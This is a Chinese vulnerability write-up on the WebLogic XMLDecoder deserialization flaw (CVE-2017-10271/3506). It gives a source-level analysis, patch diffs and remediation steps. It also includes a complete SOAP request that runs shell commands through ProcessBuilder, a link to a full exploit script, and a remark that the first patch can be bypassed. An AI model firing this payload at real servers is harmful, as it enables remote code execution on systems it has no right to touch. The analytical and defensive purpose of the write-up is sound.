一、weblogic安装 http://www.cnblogs.com/0x4D75/p/8916428.html

二、weblogic弱口令 http://www.cnblogs.com/0x4D75/p/8918761.html

三、weblogic 后台提权 http://www.cnblogs.com/0x4D75/p/8919760.html

四、 weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)

影响版本:

Oracle WebLogic Server 10.3.6.0.0版本

Oracle WebLogic Server 12.1.3.0.0版本

Oracle WebLogic Server 12.2.1.1.0版本

Oracle WebLogic Server 12.2.1.2.0版本

0. 漏洞分析

通过POC利用后,抓取weblogic的返回响应的xml部分如下,调用栈在<ns2:frame />标签中:

从调用栈可以明确的看到源码中weblogic调用函数的过程:

processRequest>readHeaderOld>receive>receiveRequest>receiveRequest>readEntry>readUTF

我们发送的poc经过这部分处理,就到了 <ns2:frame class="java.beans.XMLDecoder" file="XMLDecoder.java" line="206" method="readObject"/>中。

processRequest函数源码为:

public NextAction processRequest(Packet var1) {

   this.isUseOldFormat = false;

   if(var1.getMessage() != null) {

      HeaderList var2 = var1.getMessage().getHeaders();

      Header var3 = var2.get(WorkAreaConstants.WORK_AREA_HEADER, true);

      if(var3 != null) {

         this.readHeaderOld(var3);

         this.isUseOldFormat = true;

      }

      Header var4 = var2.get(this.JAX_WS_WORK_AREA_HEADER, true);

      if(var4 != null) {

         this.readHeader(var4);

      }

   }

WorkAreaConstants.WORK_AREA_HEADER:

public interface WorkAreaConstants{

	String WORK_NS = "http://bea.com/2004/06/soap/workarea/";

	String WORK_PREFIX = "work";

	String XML_TAG_WORK_CONTEXT = "WorkContext";

	String XML_TAG = "work:WorkContext";

	QName WORK_AREA_HEADER = new QName( "http://bea.com/2004/06/soap/workarea/", "WorkContext", "work");

	QName[] WORK_HEADERS = new QName[]{WORK_AREA_HEADER}

}

readHeaderOld源码:

protected void readHeaderOld(Header var1) {

   try {

      XMLStreamReader var2 = var1.readHeader();

      var2.nextTag();

      var2.nextTag();

      XMLStreamReaderToXMLStreamWriter var3 = new XMLStreamReaderToXMLStreamWriter();

      ByteArrayOutputStream var4 = new ByteArrayOutputStream();

      XMLStreamWriter var5 = XMLStreamWriterFactory.create(var4);

      var3.bridge(var2, var5);

      var5.close();

      WorkContextXmlInputAdapter var6 = new WorkContextXmlInputAdapter(new ByteArrayInputStream(var4.toByteArray()));

      this.receive(var6);

   } catch (XMLStreamException var7) {

      throw new WebServiceException(var7);

   } catch (IOException var8) {

      throw new WebServiceException(var8);

   }

}

其中:

ByteArrayOutputStream: 捕获内存缓冲区的数据,转换成字节数组

ByteArrayInputStream: 将字节数组转化为输入流

上述过程中,var4会被赋予Poc中java标签内的代码,即:

<java version="1.4.0" class="java.beans.XMLDecoder">

                        <void class="java.lang.ProcessBuilder">

                            <array class="java.lang.String" length="3">

                                <void index="0">

                                    <string>/bin/bash</string>

                                </void>

                                <void index="1">

                                    <string>-c</string>

                                </void>

                                <void index="2">

                                <string>id > /tmp/b4z</string>

                                </void>

                            </array>

                        <void method="start"/></void>

                    </java>

WorkContextXmlInputAdapter代码:

public WorkContextXmlInputAdapter(InputStream var1){

	this.xmlDecoder = new XMLDecoder(var1);

}

可以看到,在WorkContextXmlInputAdapter中,没有任何过滤就直接调用XMLDecoder方法,从而导致反序列化远程代码执行。

1. 利用过程

poc如下:

POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: 192.168.136.130:7001

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Content-Type: text/xml;charset=UTF-8

Content-Length: 1113

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

            <soapenv:Header>

                <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

                    <java version="1.4.0" class="java.beans.XMLDecoder">

                        <void class="java.lang.ProcessBuilder">

                            <array class="java.lang.String" length="3">

                                <void index="0">

                                    <string>/bin/bash</string>

                                </void>

                                <void index="1">

                                    <string>-c</string>

                                </void>

                                <void index="2">

                                <string>id > /tmp/b4</string>

                                </void>

                            </array>

                        <void method="start"/></void>

                    </java>

                </work:WorkContext>

            </soapenv:Header>

        <soapenv:Body/>

</soapenv:Envelope>

**python版完整利用代码: ** https://github.com/b4zinga/Explib/blob/master/weblogic.py

2. 修复建议

  • 安装补丁

四月份补丁(3506),在文件WorkContextXmlInputAdapter.java中,添加了validate()

public WorkContextXmlInputAdapter(InputStream is)  {

    ByteArrayOutputStream baos = new ByteArrayOutputStream();    try

    {      int next = 0;

      next = is.read();      while (next != -1)

      {

        baos.write(next);

        next = is.read();

      }

    }    catch (Exception e)

    {      throw new IllegalStateException("Failed to get data from input stream", e);

    }

    validate(new ByteArrayInputStream(baos.toByteArray()));    this.xmlDecoder = new XMLDecoder(new ByteArrayInputStream(baos.toByteArray()));

  }

  private void validate(InputStream is)  {

    WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory();    try

    {

      SAXParser parser = factory.newSAXParser();

      parser.parse(is, new DefaultHandler()

      {        public void startElement(String uri, String localName, String qName, Attributes attributes)

          throws SAXException        {          if (qName.equalsIgnoreCase("object")) {            throw new IllegalStateException("Invalid context type: object");

          }

        }

      });

    }    catch (ParserConfigurationException e)

    {      throw new IllegalStateException("Parser Exception", e);

    }    catch (SAXException e)

    {      throw new IllegalStateException("Parser Exception", e);

    }    catch (IOException e)

    {      throw new IllegalStateException("Parser Exception", e);

    }

  }

其实就是在解析xml的过程中,如果qName值为Object就抛出异常,明显可以绕过。

10271补丁:

private void validate(InputStream is) {

   WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory();

   try {

      SAXParser parser = factory.newSAXParser();

      parser.parse(is, new DefaultHandler() {

         private int overallarraylength = 0;

         public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXException {

            if(qName.equalsIgnoreCase("object")) {

               throw new IllegalStateException("Invalid element qName:object");

            } else if(qName.equalsIgnoreCase("new")) {

               throw new IllegalStateException("Invalid element qName:new");

            } else if(qName.equalsIgnoreCase("method")) {

               throw new IllegalStateException("Invalid element qName:method");

            } else {

               if(qName.equalsIgnoreCase("void")) {

                  for(int attClass = 0; attClass < attributes.getLength(); ++attClass) {

                     if(!"index".equalsIgnoreCase(attributes.getQName(attClass))) {

                        throw new IllegalStateException("Invalid attribute for element void:" + attributes.getQName(attClass));

                     }

                  }

               }

               if(qName.equalsIgnoreCase("array")) {

                  String var9 = attributes.getValue("class");

                  if(var9 != null && !var9.equalsIgnoreCase("byte")) {

                     throw new IllegalStateException("The value of class attribute is not valid for array element.");

                  }

本次限制了object,new, method, void,array等关键字段,这样就不能生成Java实例,所以不能执行命令。

  • 删除WLS-WebServices组件
   Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

   Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war

   Middleware/wlserver_10.3/server/lib/wls-wsat.war

weblogic系列漏洞整理 -- 4. weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271、CVE-2017-3506)的更多相关文章

  1. weblogic系列漏洞整理 -- 5. weblogic SSRF 漏洞 UDDI Explorer对外开放 (CVE-2014-4210)

    目录 五. weblogic SSRF 漏洞 UDDI Explorer对外开放 (CVE-2014-4210) 1. 利用过程 2. 修复建议 一.weblogic安装 http://www.cnb ...

  2. WebLogic XMLDecoder反序列化漏洞复现

    WebLogic XMLDecoder反序列化漏洞复现 参考链接: https://bbs.ichunqiu.com/thread-31171-1-1.html git clone https://g ...

  3. WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)复现

    WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)                                                -----by  ba ...

  4. java反序列化——XMLDecoder反序列化漏洞

    本文首发于“合天智汇”公众号 作者:Fortheone 前言 最近学习java反序列化学到了weblogic部分,weblogic之前的两个反序列化漏洞不涉及T3协议之类的,只是涉及到了XMLDeco ...

  5. weblogic系列漏洞整理 -- 1. weblogic安装

    目录 0. 概述 1. 下载安装Java环境 2. 下载安装weblogic 安装 部署domain域 进入weblogic 3. 排错 如果出现如下错误 0. 概述 WebLogic是美国Oracl ...

  6. weblogic系列漏洞整理 -- 3. weblogic 后台提权

    目录 三. weblogic 后台提权 0. 思路分析 1. 利用过程 2. 提示和技巧 一.weblogic安装 http://www.cnblogs.com/0x4D75/p/8916428.ht ...

  7. weblogic系列漏洞整理 -- 2. weblogic弱口令

    目录 二. weblogic弱口令 0. 思路 1. python爆破脚本 2. 技巧 一.weblogic安装 http://www.cnblogs.com/0x4D75/p/8916428.htm ...

  8. 【研究】Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)

    影响范围: Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.1.3.0.0版本 Oracle WebLogic Server ...

  9. Java反序列化漏洞从入门到深入(转载)

    前言 学习本系列文章需要的Java基础: 了解Java基础语法及结构(菜鸟教程) 了解Java面向对象编程思想(快速理解请上知乎读故事,深入钻研建议买本<疯狂Java讲义>另外有一个刘意老 ...

随机推荐

  1. Windows Azure开发之Linux虚拟机

     Windows Azure是微软的云服务集合,用来提供云在线服务所需要的操作系统与基础存储与管理的平台,是微软的云计算的核心组成组件之一.其中windows azure提供的最重要的一项服务就是 ...

  2. (转)内核模块操作命令-lsmod+rmmod+modinfo+modprobe

    原文:http://watchmen.xin/2018/07/13/IT%E7%A7%91%E5%AD%A6%E6%8A%80%E6%9C%AF%E7%9F%A5%E8%AF%86%E4%BD%93% ...

  3. .Net开源myrtille远程连接服务(支持SSH)

    今天在博客园首页,无意中看到一篇文章(https://github.com/Microsoft/dotnet/blob/master/dotnet-developer-projects.md),于是对 ...

  4. 接口自动化思路_JAVA

    写在开头: 技术渣做接口自动化,大神们请轻喷!多提提优化方案和问题点. 以前做接口测试一直通过postman 和 soapUI来做,Postman 是Chrome的一个插件Case多了不好管理,同时执 ...

  5. Appium定位方式总结

    通过appium-desktop定位元素 ClassName Android Android的class属性对应ClassName定位方式,ClassName一般都是会重复的,可以通过index来获取 ...

  6. 以ActiveMQ为例JAVA消息中间件学习【3】——SpringBoot中使用ActiveMQ

    前言 首先我们在java环境中使用了ActiveMQ,然后我们又在Spring中使用了ActiveMQ 本来这样已经可以了,但是最近SpringBoot也来了.所以在其中也需要使用试试. 可以提前透露 ...

  7. Django内置权限扩展案例

    当Django的内置权限无法满足需求的时候就自己扩展吧~ 背景介绍 overmind项目使用了Django内置的权限系统,Django内置权限系统基于model层做控制,新的model创建后会默认新建 ...

  8. 音频标签化2:youtube-8m项目的训练、评估与测试

    之前小程介绍了使用机器学习的办法来解决"音频标签化"的问题,并且提到了训练样本audioset跟youtube-8m的dataset,而训练模型上也提到了youtube-8m的模型 ...

  9. 记录一个简单的dbcp数据连接池

    这个示例用到了ThreadLocal与dbcp,我觉得有点意思,就整理了下.使用dbcp,肯定要导入commons-dbcp.jar包.下面直接贴DBUtil代码: public class DBUt ...

  10. zookeeper ZAB协议 Follower和leader源码分析

    Follower处理逻辑 void followLeader() throws InterruptedException { //... try { //获取leader server QuorumS ...